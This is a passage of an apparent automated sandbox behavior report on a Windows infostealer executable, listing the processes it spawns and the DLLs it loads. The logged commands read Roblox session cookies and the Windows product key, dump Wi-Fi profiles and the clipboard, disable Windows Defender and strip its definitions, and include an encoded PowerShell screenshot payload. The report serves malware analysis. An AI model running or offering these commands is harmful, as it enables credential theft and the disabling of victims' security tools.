0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: libssl-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
